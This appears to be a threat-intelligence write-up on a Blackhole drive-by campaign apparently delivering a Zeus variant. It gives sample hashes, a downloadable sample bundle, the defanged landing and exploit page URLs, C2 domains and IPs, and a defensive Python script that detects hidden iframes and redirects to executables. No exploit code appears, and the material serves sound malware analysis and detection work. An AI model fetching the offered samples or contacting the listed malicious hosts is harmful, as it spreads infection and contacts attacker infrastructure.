File: KB971033.exe
Size: 201216
MD5: EC750B75E83749C715D7834E130FCE8E
File: hnszs0.exe
Size: 184832
MD5: 9DB4174373601F74FCE0ECBC77A9577D
Sample credit Bryan Nolen
Download (pass infected)
LIST OF FILES INCLUDED
│ investigation_notes.txt
│
├───dropped_files
│ ├───exe
│ │ hnszs0.exe
│ │ KB971033.exe
│ │
│ ├───java
│ │ jar_cache.zip
│ │
│ ├───pdf
│ │ ap1.pdf
│ │ ap2.pdf
│ │
│ └───swf
│ score.swf
│
├───email
│ MSUPDATE.eml
│
├───extracted_files
│ pid_1412_Explorer_Dumped.EXE
│
├───html
│ exploit.html
│ landing.html
│
└───pcap
dump.pcap
Quick analysis made by Bryan Nolen
Landing page (hxxp://volozhin.gov.by/pub/KB971033/?clien-e=3D1093821896211 and saved as html/landing.html) contains a hidden IFRAME that leads to the exploit page. This landing page also contains a META REFRESH that leads to another suspect binary (hxxp://volozhin.gov.by/pub/KB971033/KB971033.exe saved as dropped_files/exe/KB971033.exe) - detection on this second binary is low ( https://www.virustotal.com/file/0e14f5e6cdab9218135d3a7eed11f0457c9934210859f6075d63bc609469d43b/analysis/1335596875/ )
Exploit page (hxxp://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486 and saved as html/exploit.html) utilises a trio of exploits designed to attack java, adobe acrobat, or flash.
Analysis of the javascript was performed with the assistance of URLQUERY report link (http://urlquery.net/report.php?id=47909).
The attack payloads are saved as
- dropped_files/pdf/ap1.pdf
- dropped_files/pdf/ap2.pdf
- dropped_files/swf/score.swf
- dropped_files/java/jar_cache.zip
The "final" malicious payload is saved as (dropped_files/exe/hnszs0.exe) and its detection is VERY poor ( https://www.virustotal.com/file/c48df0394939fccb9a3ac0853d0ae696d04e7c5230d3a6468ebce257a0be4ccc/analysis/1335598639/ )
A copy of explorer.exe extracted from the memory image after infection is included; based on observations, this is the process it migrated into after infection. It is saved in (extracted_files/pid_1412_Explorer_Dumped.EXE)
PCAP is supplied in the pcap folder. The hosts identified in this malware are:
Landing Page: volozhin.gov.by 212.98.162.62
Exploit Page: fewfewfewfew.ibiz.cc 83.69.233.156
C2: google-analytics-sv1.com 91.230.147.222
(alt C2): localdomain01.com 91.230.147.145
Note: the Alternate C2 was seen in earlier investigations of this malware and changed to the C2 address above when this round of investigation was performed.
Full memory dumps from my sandbox VM available on request.
I have a strong suspicion this is a Zeus variant.
-Bryan Nolen <bryan _at_ arc .dot. net .dot. au>
@bryannolen
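As an added example (not part of Bryan Nolen's notes or of the sample bundle): a small defender-side triage script that flags the two redirect mechanisms the notes describe in the landing page, a hidden IFRAME (the hop to the exploit page) and a META REFRESH whose target is an executable (the hop to the second binary). The HTML fed to it is a constructed stand-in using .invalid hostnames, not the real landing.html.

```python
"""Triage of a drive-by landing page for the two hops described above.

Flags (1) IFRAMEs hidden via style or 0/1 pixel dimensions and
(2) META REFRESH tags whose url= target ends in an executable extension.
SAMPLE below is constructed for this example; it is not the real page.
"""
import re
from html.parser import HTMLParser

EXEC_EXT = re.compile(r"\.(exe|scr|dll|msi)(\?|$)", re.IGNORECASE)
REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)


class LandingPageTriage(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # list of (finding_kind, target_url)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = ("display:none" in style
                      or "visibility:hidden" in style
                      or a.get("width", "") in ("0", "1")
                      or a.get("height", "") in ("0", "1"))
            if hidden:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.search(a.get("content", ""))
            target = m.group(1) if m else ""
            if EXEC_EXT.search(target):
                self.findings.append(("meta_refresh_to_executable", target))


def triage(html):
    """Return the list of suspicious redirects found in the page."""
    p = LandingPageTriage()
    p.feed(html)
    return p.findings


# Constructed sample: fake "update" page with a meta refresh to an .exe,
# a 1x1 hidden iframe to an exploit-kit style URL, and one benign iframe.
SAMPLE = """<html><head>
<meta http-equiv="refresh" content="3; url=http://example.invalid/pub/update.exe">
</head><body><h1>Windows Update</h1>
<iframe src="http://exploit.invalid/main.php?page=PLACEHOLDER" width="1" height="1" style="visibility: hidden"></iframe>
<iframe src="http://example.invalid/legit.html" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, target in triage(SAMPLE):
        print(kind, target)
```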
SITE TYPE                 IP              DOMAIN                    COUNTRY             ASN / ORGANISATION
LEGITIMATE, COMPROMISED   212.98.162.62   volozhin.gov.by           Belarus             AS12406 Business network j.v. Business Network JV
BLACKHOLE                 83.69.233.156   fewfewfewfew.ibiz.cc      Russian Federation  AS28762 AWAX Telecom Ltd AWAX Telecom Ltd.
PAYLOAD - ZEUS C2         91.230.147.222  google-analytics-sv1.com  Russian Federation  AS57189 PE Spiridonova Vera Ana OOO Aldevir Invest
C2 (alternate)            91.230.147.145  localdomain01.com         Russian Federation  AS57189 PE Spiridonova Vera Ana OOO Aldevir Invest